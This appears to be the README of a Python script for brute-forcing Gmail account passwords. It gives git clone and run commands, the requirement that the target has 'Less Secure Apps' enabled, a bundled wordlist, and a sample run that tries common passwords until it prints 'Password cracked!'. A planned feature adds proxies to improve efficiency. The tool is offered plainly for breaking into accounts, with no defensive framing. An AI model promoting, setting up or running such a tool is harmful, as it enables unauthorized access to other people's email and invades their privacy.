A script written in python3 for bruteforcing Gmail accounts.



Made for bruteforcing gmail accounts.

It needs Less Secure Apps setting turned on in order to work.


For windows

git clone https://github.com/Sarthak2143/GmailBruteforce.git
cd GmailBruteforce/
python3 main.py

For Mac/Linux

git clone https://github.com/Sarthak2143/GmailBruteforce.git
cd GmailBruteforce/
chmod +x main.py


You need a target email address with less secure apps setting turned ON and a wordlist for bruteforcing.

Don't have wordlist?

Don't worry this tool comes with a wordlist file that you can use.

└─$ python3 main.py

[?] Enter email adress: [email protected]
[?] Enter wordlist path: wordlist.txt
Starting bruteforcing...

[!] Incorrect password: 123456
[!] Incorrect password: 12345
[!] Incorrect password: 123456789
[!] Incorrect password: password                        
[!] Incorrect password: iloveyou
[!] Incorrect password: princess
[!] Incorrect password: 1234567                         
[!] Incorrect password: 12345678                        
[!] Incorrect password: abc123
[!] Incorrect password: nicole                          
[!] Incorrect password: daniel                         
[!] Incorrect password: babygirl                       
[!] Incorrect password: monkey
[!] Incorrect password: lovely
[!] Incorrect password: jessica
[!] Incorrect password: michael
[!] Incorrect password: ashley
[!] Incorrect password: qwerty
[!] Incorrect password: 111111
[!] Incorrect password: iloveu
[!] Incorrect password: 000000
[!] Incorrect password: michelle
[!] Incorrect password: tigger
[!] Incorrect password: sunshine
[+] Correct password: chocolate
[+] Password cracked!

[*] Script finished!
[*] Time Elapsed: 18 seconds.

You've to specify the gmail address and the wordlist.


You need git and python3 need on your system inorder to work.

The script will download essential packages automatically so you don't have to worry much.


The E-Mail address should be of Gmail and it must have Less secure apps turned ON.


  • Use proxies for better efficiency.
  • A command line version with flags.
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